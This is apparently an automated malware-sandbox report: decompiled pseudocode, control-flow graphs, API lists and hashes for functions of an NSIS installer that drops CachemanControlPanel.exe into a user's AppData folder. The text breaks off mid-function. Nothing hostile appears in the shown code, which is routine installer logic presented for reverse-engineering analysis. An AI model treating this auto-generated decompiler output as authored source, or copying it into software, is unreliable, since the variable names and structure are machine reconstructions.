                                                        control_flow_graph 429 40618a-406195 430 406197-4061a6 429->430 431 4061a8-4061be 429->431 430->431 432 4061c4-4061cf 431->432 433 4063af-4063b3 431->433 432->433 434 4061d5-4061dc 432->434 435 4061e1-4061eb 433->435 436 4063b9-4063c3 433->436 434->433 435->436 439 4061f1-4061f8 435->439 437 4063c5-4063c9 call 4060f7 436->437 438 4063ce-4063cf 436->438 437->438 441 4063a2 439->441 442 4061fe-406232 439->442 443 4063a4-4063aa 441->443 444 4063ac-4063ae 441->444 445 406238-406242 442->445 446 40634f-406352 442->446 443->433 444->433 447 406244-406248 445->447 448 40625c 445->448 449 406382-406385 446->449 450 406354-406357 446->450 447->448 456 40624a-40624e 447->456 453 406263-40626a 448->453 454 406393-4063a0 lstrlenA 449->454 455 406387-40638e call 40618a 449->455 451 406367-406373 call 4060f7 450->451 452 406359-406365 call 406055 450->452 467 406378-40637e 451->467 452->467 458 40626c-40626e 453->458 459 40626f-406271 453->459 454->433 455->454 456->448 462 406250-406254 456->462 458->459 465 406273-406296 call 405fde 459->465 466 4062aa-4062ad 459->466 462->448 463 406256-40625a 462->463 463->453 477 406336-40633a 465->477 478 40629c-4062a5 call 40618a 465->478 470 4062bd-4062c0 466->470 471 4062af-4062bb GetSystemDirectoryA 466->471 467->454 469 406380 467->469 473 406347-40634d call 4063d2 469->473 475 4062c2-4062d0 GetWindowsDirectoryA 470->475 476 40632d-40632f 470->476 474 406331-406334 471->474 473->454 474->473 474->477 475->476 476->474 479 4062d2-4062dc 476->479 477->473 484 40633c-406342 lstrcatA 477->484 478->474 481 4062f6-40630c SHGetSpecialFolderLocation 479->481 482 4062de-4062e1 479->482 487 40632a 481->487 488 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 481->488 482->481 486 4062e3-4062ea 482->486 484->473 490 4062f2-4062f4 486->490 487->476 488->474 488->487 490->474 490->481
                                                        C-Code - Quality: 72%
                                                        			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                        				struct _ITEMIDLIST* _v8;
                                                        				char _v12;
                                                        				signed int _v16;
                                                        				signed char _v20;
                                                        				signed int _v24;
                                                        				signed char _v28;
                                                        				signed int _t38;
                                                        				CHAR* _t39;
                                                        				signed int _t41;
                                                        				char _t52;
                                                        				char _t53;
                                                        				char _t55;
                                                        				char _t57;
                                                        				void* _t65;
                                                        				char* _t66;
                                                        				signed int _t80;
                                                        				intOrPtr _t86;
                                                        				char _t88;
                                                        				void* _t89;
                                                        				CHAR* _t90;
                                                        				void* _t92;
                                                        				signed int _t97;
                                                        				signed int _t99;
                                                        				void* _t100;
                                                        
                                                        				_t92 = __esi;
                                                        				_t89 = __edi;
                                                        				_t65 = __ebx;
                                                        				_t38 = _a8;
                                                        				if(_t38 < 0) {
                                                        					_t86 =  *0x42ebfc; // 0x68bf12
                                                        					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                        				}
                                                        				_push(_t65);
                                                        				_push(_t92);
                                                        				_push(_t89);
                                                        				_t66 = _t38 +  *0x42f478;
                                                        				_t39 = 0x42e3c0;
                                                        				_t90 = 0x42e3c0;
                                                        				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                        					_t90 = _a4;
                                                        					_a4 = _a4 & 0x00000000;
                                                        				}
                                                        				while(1) {
                                                        					_t88 =  *_t66;
                                                        					if(_t88 == 0) {
                                                        						break;
                                                        					}
                                                        					__eflags = _t90 - _t39 - 0x400;
                                                        					if(_t90 - _t39 >= 0x400) {
                                                        						break;
                                                        					}
                                                        					_t66 = _t66 + 1;
                                                        					__eflags = _t88 - 4;
                                                        					_a8 = _t66;
                                                        					if(__eflags >= 0) {
                                                        						if(__eflags != 0) {
                                                        							 *_t90 = _t88;
                                                        							_t90 =  &(_t90[1]);
                                                        							__eflags = _t90;
                                                        						} else {
                                                        							 *_t90 =  *_t66;
                                                        							_t90 =  &(_t90[1]);
                                                        							_t66 = _t66 + 1;
                                                        						}
                                                        						continue;
                                                        					}
                                                        					_t41 =  *((char*)(_t66 + 1));
                                                        					_t80 =  *_t66;
                                                        					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                        					_v24 = _t80;
                                                        					_v28 = _t80 | 0x00000080;
                                                        					_v16 = _t41;
                                                        					_v20 = _t41 | 0x00000080;
                                                        					_t66 = _a8 + 2;
                                                        					__eflags = _t88 - 2;
                                                        					if(_t88 != 2) {
                                                        						__eflags = _t88 - 3;
                                                        						if(_t88 != 3) {
                                                        							__eflags = _t88 - 1;
                                                        							if(_t88 == 1) {
                                                        								__eflags = (_t41 | 0xffffffff) - _t97;
                                                        								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                        							}
                                                        							L42:
                                                        							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                        							_t39 = 0x42e3c0;
                                                        							continue;
                                                        						}
                                                        						__eflags = _t97 - 0x1d;
                                                        						if(_t97 != 0x1d) {
                                                        							__eflags = (_t97 << 0xa) + 0x430000;
                                                        							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                                                        						} else {
                                                        							E00406055(_t90,  *0x42f428);
                                                        						}
                                                        						__eflags = _t97 + 0xffffffeb - 7;
                                                        						if(_t97 + 0xffffffeb < 7) {
                                                        							L33:
                                                        							E004063D2(_t90);
                                                        						}
                                                        						goto L42;
                                                        					}
                                                        					_t52 =  *0x42f42c;
                                                        					__eflags = _t52;
                                                        					_t99 = 2;
                                                        					if(_t52 >= 0) {
                                                        						L13:
                                                        						_a8 = 1;
                                                        						L14:
                                                        						__eflags =  *0x42f4c4;
                                                        						if( *0x42f4c4 != 0) {
                                                        							_t99 = 4;
                                                        						}
                                                        						__eflags = _t80;
                                                        						if(__eflags >= 0) {
                                                        							__eflags = _t80 - 0x25;
                                                        							if(_t80 != 0x25) {
                                                        								__eflags = _t80 - 0x24;
                                                        								if(_t80 == 0x24) {
                                                        									GetWindowsDirectoryA(_t90, 0x400);
                                                        									_t99 = 0;
                                                        								}
                                                        								while(1) {
                                                        									__eflags = _t99;
                                                        									if(_t99 == 0) {
                                                        										goto L30;
                                                        									}
                                                        									_t53 =  *0x42f424;
                                                        									_t99 = _t99 - 1;
                                                        									__eflags = _t53;
                                                        									if(_t53 == 0) {
                                                        										L26:
                                                        										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                        										__eflags = _t55;
                                                        										if(_t55 != 0) {
                                                        											L28:
                                                        											 *_t90 =  *_t90 & 0x00000000;
                                                        											__eflags =  *_t90;
                                                        											continue;
                                                        										}
                                                        										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                        										_v12 = _t55;
                                                        										__imp__CoTaskMemFree(_v8);
                                                        										__eflags = _v12;
                                                        										if(_v12 != 0) {
                                                        											goto L30;
                                                        										}
                                                        										goto L28;
                                                        									}
                                                        									__eflags = _a8;
                                                        									if(_a8 == 0) {
                                                        										goto L26;
                                                        									}
                                                        									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                                        									__eflags = _t57;
                                                        									if(_t57 == 0) {
                                                        										goto L30;
                                                        									}
                                                        									goto L26;
                                                        								}
                                                        								goto L30;
                                                        							}
                                                        							GetSystemDirectoryA(_t90, 0x400);
                                                        							goto L30;
                                                        						} else {
                                                        							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                        							__eflags =  *_t90;
                                                        							if( *_t90 != 0) {
                                                        								L31:
                                                        								__eflags = _v16 - 0x1a;
                                                        								if(_v16 == 0x1a) {
                                                        									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                        								}
                                                        								goto L33;
                                                        							}
                                                        							E0040618A(_t66, _t90, _t99, _t90, _v16);
                                                        							L30:
                                                        							__eflags =  *_t90;
                                                        							if( *_t90 == 0) {
                                                        								goto L33;
                                                        							}
                                                        							goto L31;
                                                        						}
                                                        					}
                                                        					__eflags = _t52 - 0x5a04;
                                                        					if(_t52 == 0x5a04) {
                                                        						goto L13;
                                                        					}
                                                        					__eflags = _v16 - 0x23;
                                                        					if(_v16 == 0x23) {
                                                        						goto L13;
                                                        					}
                                                        					__eflags = _v16 - 0x2e;
                                                        					if(_v16 == 0x2e) {
                                                        						goto L13;
                                                        					} else {
                                                        						_a8 = _a8 & 0x00000000;
                                                        						goto L14;
                                                        					}
                                                        				}
                                                        				 *_t90 =  *_t90 & 0x00000000;
                                                        				if(_a4 == 0) {
                                                        					return _t39;
                                                        				}
                                                        				return E004060F7(_a4, _t39);
                                                        			}



























                                                        0x0040618a
                                                        0x0040618a
                                                        0x0040618a
                                                        0x00406190
                                                        0x00406195
                                                        0x00406197
                                                        0x004061a6
                                                        0x004061a6
                                                        0x004061ae
                                                        0x004061af
                                                        0x004061b0
                                                        0x004061b1
                                                        0x004061b4
                                                        0x004061bc
                                                        0x004061be
                                                        0x004061d5
                                                        0x004061d8
                                                        0x004061d8
                                                        0x004063af
                                                        0x004063af
                                                        0x004063b3
                                                        0x00000000
                                                        0x00000000
                                                        0x004061e5
                                                        0x004061eb
                                                        0x00000000
                                                        0x00000000
                                                        0x004061f1
                                                        0x004061f2
                                                        0x004061f5
                                                        0x004061f8
                                                        0x004063a2
                                                        0x004063ac
                                                        0x004063ae
                                                        0x004063ae
                                                        0x004063a4
                                                        0x004063a6
                                                        0x004063a8
                                                        0x004063a9
                                                        0x004063a9
                                                        0x00000000
                                                        0x004063a2
                                                        0x004061fe
                                                        0x00406202
                                                        0x00406212
                                                        0x00406219
                                                        0x0040621c
                                                        0x00406224
                                                        0x00406227
                                                        0x0040622e
                                                        0x0040622f
                                                        0x00406232
                                                        0x0040634f
                                                        0x00406352
                                                        0x00406382
                                                        0x00406385
                                                        0x0040638a
                                                        0x0040638e
                                                        0x0040638e
                                                        0x00406393
                                                        0x00406399
                                                        0x0040639b
                                                        0x00000000
                                                        0x0040639b
                                                        0x00406354
                                                        0x00406357
                                                        0x0040636c
                                                        0x00406373
                                                        0x00406359
                                                        0x00406360
                                                        0x00406360
                                                        0x0040637b
                                                        0x0040637e
                                                        0x00406347
                                                        0x00406348
                                                        0x00406348
                                                        0x00000000
                                                        0x0040637e
                                                        0x00406238
                                                        0x0040623f
                                                        0x00406241
                                                        0x00406242
                                                        0x0040625c
                                                        0x0040625c
                                                        0x00406263
                                                        0x00406263
                                                        0x0040626a
                                                        0x0040626e
                                                        0x0040626e
                                                        0x0040626f
                                                        0x00406271
                                                        0x004062aa
                                                        0x004062ad
                                                        0x004062bd
                                                        0x004062c0
                                                        0x004062c8
                                                        0x004062ce
                                                        0x004062ce
                                                        0x0040632d
                                                        0x0040632d
                                                        0x0040632f
                                                        0x00000000
                                                        0x00000000
                                                        0x004062d2
                                                        0x004062d9
                                                        0x004062da
                                                        0x004062dc
                                                        0x004062f6
                                                        0x00406304
                                                        0x0040630a
                                                        0x0040630c
                                                        0x0040632a
                                                        0x0040632a
                                                        0x0040632a
                                                        0x00000000
                                                        0x0040632a
                                                        0x00406312
                                                        0x0040631b
                                                        0x0040631e
                                                        0x00406324
                                                        0x00406328
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406328
                                                        0x004062de
                                                        0x004062e1
                                                        0x00000000
                                                        0x00000000
                                                        0x004062f0
                                                        0x004062f2
                                                        0x004062f4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004062f4
                                                        0x00000000
                                                        0x0040632d
                                                        0x004062b5
                                                        0x00000000
                                                        0x00406273
                                                        0x0040628e
                                                        0x00406293
                                                        0x00406296
                                                        0x00406336
                                                        0x00406336
                                                        0x0040633a
                                                        0x00406342
                                                        0x00406342
                                                        0x00000000
                                                        0x0040633a
                                                        0x004062a0
                                                        0x00406331
                                                        0x00406331
                                                        0x00406334
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406334
                                                        0x00406271
                                                        0x00406244
                                                        0x00406248
                                                        0x00000000
                                                        0x00000000
                                                        0x0040624a
                                                        0x0040624e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406250
                                                        0x00406254
                                                        0x00000000
                                                        0x00406256
                                                        0x00406256
                                                        0x00000000
                                                        0x00406256
                                                        0x00406254
                                                        0x004063b9
                                                        0x004063c3
                                                        0x004063cf
                                                        0x004063cf
                                                        0x00000000

                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                        • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,00405256,Completed,00000000), ref: 004062C8
                                                        • SHGetSpecialFolderLocation.SHELL32(00405256,747DEA30,?,Completed,00000000,00405256,Completed,00000000), ref: 00406304
                                                        • SHGetPathFromIDListA.SHELL32(747DEA30,: Completed), ref: 00406312
                                                        • CoTaskMemFree.OLE32(747DEA30), ref: 0040631E
                                                        • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                        • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405256,Completed,00000000,00000000,00427A9C,747DEA30), ref: 00406394
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                        • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 717251189-905382516
                                                        • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                        • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                        • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                        • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 491 401759-40177c call 402bce call 405afc 496 401786-401798 call 4060f7 call 405a8f lstrcatA 491->496 497 40177e-401784 call 4060f7 491->497 502 40179d-4017a3 call 4063d2 496->502 497->502 507 4017a8-4017ac 502->507 508 4017ae-4017b8 call 40646b 507->508 509 4017df-4017e2 507->509 517 4017ca-4017dc 508->517 518 4017ba-4017c8 CompareFileTime 508->518 511 4017e4-4017e5 call 405c6b 509->511 512 4017ea-401806 call 405c90 509->512 511->512 519 401808-40180b 512->519 520 40187e-4018a7 call 40521e call 4030d8 512->520 517->509 518->517 521 401860-40186a call 40521e 519->521 522 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 519->522 534 4018a9-4018ad 520->534 535 4018af-4018bb SetFileTime 520->535 532 401873-401879 521->532 522->507 554 401855-401856 522->554 536 402a63 532->536 534->535 538 4018c1-4018cc FindCloseChangeNotification 534->538 535->538 541 402a65-402a69 536->541 539 4018d2-4018d5 538->539 540 402a5a-402a5d 538->540 543 4018d7-4018e8 call 40618a lstrcatA 539->543 544 4018ea-4018ed call 40618a 539->544 540->536 550 4018f2-40238c call 405813 543->550 544->550 550->540 550->541 554->532 556 401858-401859 554->556 556->521
                                                        C-Code - Quality: 61%
                                                        			E00401759(FILETIME* __ebx, void* __eflags) {
                                                        				void* _t33;
                                                        				void* _t41;
                                                        				void* _t43;
                                                        				FILETIME* _t49;
                                                        				FILETIME* _t62;
                                                        				void* _t64;
                                                        				signed int _t70;
                                                        				FILETIME* _t71;
                                                        				FILETIME* _t75;
                                                        				signed int _t77;
                                                        				void* _t80;
                                                        				CHAR* _t82;
                                                        				CHAR* _t83;
                                                        				void* _t85;
                                                        
                                                        				_t75 = __ebx;
                                                        				_t82 = E00402BCE(0x31);
                                                        				 *(_t85 - 8) = _t82;
                                                        				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                        				_t33 = E00405AFC(_t82);
                                                        				_push(_t82);
                                                        				_t83 = "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel\\CachemanControlPanel.exe";
                                                        				if(_t33 == 0) {
                                                        					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel")), ??);
                                                        				} else {
                                                        					E004060F7();
                                                        				}
                                                        				E004063D2(_t83);
                                                        				while(1) {
                                                        					__eflags =  *(_t85 + 8) - 3;
                                                        					if( *(_t85 + 8) >= 3) {
                                                        						_t64 = E0040646B(_t83);
                                                        						_t77 = 0;
                                                        						__eflags = _t64 - _t75;
                                                        						if(_t64 != _t75) {
                                                        							_t71 = _t64 + 0x14;
                                                        							__eflags = _t71;
                                                        							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                        						}
                                                        						asm("sbb eax, eax");
                                                        						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                        						__eflags = _t70;
                                                        						 *(_t85 + 8) = _t70;
                                                        					}
                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                        					if( *(_t85 + 8) == _t75) {
                                                        						E00405C6B(_t83);
                                                        					}
                                                        					__eflags =  *(_t85 + 8) - 1;
                                                        					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                        					__eflags = _t41 - 0xffffffff;
                                                        					 *(_t85 - 0xc) = _t41;
                                                        					if(_t41 != 0xffffffff) {
                                                        						break;
                                                        					}
                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                        					if( *(_t85 + 8) != _t75) {
                                                        						E0040521E(0xffffffe2,  *(_t85 - 8));
                                                        						__eflags =  *(_t85 + 8) - 2;
                                                        						if(__eflags == 0) {
                                                        							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                        						}
                                                        						L31:
                                                        						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                        						__eflags =  *0x42f4c8;
                                                        						goto L32;
                                                        					} else {
                                                        						E004060F7(0x40ac38, 0x430000);
                                                        						E004060F7(0x430000, _t83);
                                                        						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\engineer\AppData\Roaming\CachemanControlPanel",  *((intOrPtr*)(_t85 - 0x14)));
                                                        						E004060F7(0x430000, 0x40ac38);
                                                        						_t62 = E00405813("C:\Users\engineer\AppData\Roaming\CachemanControlPanel",  *(_t85 - 0x28) >> 3) - 4;
                                                        						__eflags = _t62;
                                                        						if(_t62 == 0) {
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t62 == 1;
                                                        							if(_t62 == 1) {
                                                        								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                        								L32:
                                                        								_t49 = 0;
                                                        								__eflags = 0;
                                                        							} else {
                                                        								_push(_t83);
                                                        								_push(0xfffffffa);
                                                        								E0040521E();
                                                        								L29:
                                                        								_t49 = 0x7fffffff;
                                                        							}
                                                        						}
                                                        					}
                                                        					L33:
                                                        					return _t49;
                                                        				}
                                                        				E0040521E(0xffffffea,  *(_t85 - 8)); // executed
                                                        				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                        				_push(_t75);
                                                        				_push(_t75);
                                                        				_push( *(_t85 - 0xc));
                                                        				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                        				_t43 = E004030D8(); // executed
                                                        				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                        				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                        				_t80 = _t43;
                                                        				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                        					L22:
                                                        					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                        				} else {
                                                        					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                        					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                        						goto L22;
                                                        					}
                                                        				}
                                                        				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                        				__eflags = _t80 - _t75;
                                                        				if(_t80 >= _t75) {
                                                        					goto L31;
                                                        				} else {
                                                        					__eflags = _t80 - 0xfffffffe;
                                                        					if(_t80 != 0xfffffffe) {
                                                        						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                                                        					} else {
                                                        						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                        						lstrcatA(_t83,  *(_t85 - 8));
                                                        					}
                                                        					_push(0x200010);
                                                        					_push(_t83);
                                                        					E00405813();
                                                        					goto L29;
                                                        				}
                                                        				goto L33;
                                                        			}

















                                                        0x00401759
                                                        0x00401760
                                                        0x00401769
                                                        0x0040176c
                                                        0x0040176f
                                                        0x00401774
                                                        0x00401775
                                                        0x0040177c
                                                        0x00401798
                                                        0x0040177e
                                                        0x0040177f
                                                        0x0040177f
                                                        0x0040179e
                                                        0x004017a8
                                                        0x004017a8
                                                        0x004017ac
                                                        0x004017af
                                                        0x004017b4
                                                        0x004017b6
                                                        0x004017b8
                                                        0x004017bd
                                                        0x004017bd
                                                        0x004017c8
                                                        0x004017c8
                                                        0x004017d9
                                                        0x004017db
                                                        0x004017db
                                                        0x004017dc
                                                        0x004017dc
                                                        0x004017df
                                                        0x004017e2
                                                        0x004017e5
                                                        0x004017e5
                                                        0x004017ec
                                                        0x004017fb
                                                        0x00401800
                                                        0x00401803
                                                        0x00401806
                                                        0x00000000
                                                        0x00000000
                                                        0x00401808
                                                        0x0040180b
                                                        0x00401865
                                                        0x0040186a
                                                        0x004015b0
                                                        0x004027bf
                                                        0x004027bf
                                                        0x00402a5a
                                                        0x00402a5d
                                                        0x00402a5d
                                                        0x00000000
                                                        0x0040180d
                                                        0x00401813
                                                        0x0040181e
                                                        0x0040182b
                                                        0x00401836
                                                        0x0040184c
                                                        0x0040184c
                                                        0x0040184f
                                                        0x00000000
                                                        0x00401855
                                                        0x00401855
                                                        0x00401856
                                                        0x00401873
                                                        0x00402a63
                                                        0x00402a63
                                                        0x00402a63
                                                        0x00401858
                                                        0x00401858
                                                        0x00401859
                                                        0x00401492
                                                        0x00402387
                                                        0x00402387
                                                        0x00402387
                                                        0x00401856
                                                        0x0040184f
                                                        0x00402a65
                                                        0x00402a69
                                                        0x00402a69
                                                        0x00401883
                                                        0x00401888
                                                        0x0040188e
                                                        0x0040188f
                                                        0x00401890
                                                        0x00401893
                                                        0x00401896
                                                        0x0040189b
                                                        0x004018a1
                                                        0x004018a5
                                                        0x004018a7
                                                        0x004018af
                                                        0x004018bb
                                                        0x004018a9
                                                        0x004018a9
                                                        0x004018ad
                                                        0x00000000
                                                        0x00000000
                                                        0x004018ad
                                                        0x004018c4
                                                        0x004018ca
                                                        0x004018cc
                                                        0x00000000
                                                        0x004018d2
                                                        0x004018d2
                                                        0x004018d5
                                                        0x004018ed
                                                        0x004018d7
                                                        0x004018da
                                                        0x004018e3
                                                        0x004018e3
                                                        0x004018f2
                                                        0x004018f7
                                                        0x00402382
                                                        0x00000000
                                                        0x00402382
                                                        0x00000000

                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe,C:\Users\user\AppData\Roaming\CachemanControlPanel,00000000,00000000,00000031), ref: 00401798
                                                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe,C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe,00000000,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe,C:\Users\user\AppData\Roaming\CachemanControlPanel,00000000,00000000,00000031), ref: 004017C2
                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00427A9C,747DEA30), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Roaming\CachemanControlPanel$C:\Users\user\AppData\Roaming\CachemanControlPanel$C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe
                                                        • API String ID: 1941528284-2624279985
                                                        • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                        • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                        • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                        • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 558 40521e-405233 559 4052e9-4052ed 558->559 560 405239-40524b 558->560 561 405256-405262 lstrlenA 560->561 562 40524d-405251 call 40618a 560->562 564 405264-405274 lstrlenA 561->564 565 40527f-405283 561->565 562->561 564->559 566 405276-40527a lstrcatA 564->566 567 405292-405296 565->567 568 405285-40528c SetWindowTextA 565->568 566->565 569 405298-4052da SendMessageA * 3 567->569 570 4052dc-4052de 567->570 568->567 569->570 570->559 571 4052e0-4052e3 570->571 571->559
                                                        C-Code - Quality: 100%
                                                        			E0040521E(CHAR* _a4, CHAR* _a8) {
                                                        				struct HWND__* _v8;
                                                        				signed int _v12;
                                                        				CHAR* _v32;
                                                        				long _v44;
                                                        				int _v48;
                                                        				void* _v52;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				CHAR* _t26;
                                                        				signed int _t27;
                                                        				CHAR* _t28;
                                                        				long _t29;
                                                        				signed int _t39;
                                                        
                                                        				_t26 =  *0x42ec04; // 0x9005e
                                                        				_v8 = _t26;
                                                        				if(_t26 != 0) {
                                                        					_t27 =  *0x42f4f4;
                                                        					_v12 = _t27;
                                                        					_t39 = _t27 & 0x00000001;
                                                        					if(_t39 == 0) {
                                                        						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                                                        					}
                                                        					_t26 = lstrlenA(0x42a070);
                                                        					_a4 = _t26;
                                                        					if(_a8 == 0) {
                                                        						L6:
                                                        						if((_v12 & 0x00000004) == 0) {
                                                        							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070); // executed
                                                        						}
                                                        						if((_v12 & 0x00000002) == 0) {
                                                        							_v32 = 0x42a070;
                                                        							_v52 = 1;
                                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                        							_v44 = 0;
                                                        							_v48 = _t29 - _t39;
                                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                        						}
                                                        						if(_t39 != 0) {
                                                        							_t28 = _a4;
                                                        							 *((char*)(_t28 + 0x42a070)) = 0;
                                                        							return _t28;
                                                        						}
                                                        					} else {
                                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                        						if(_t26 < 0x800) {
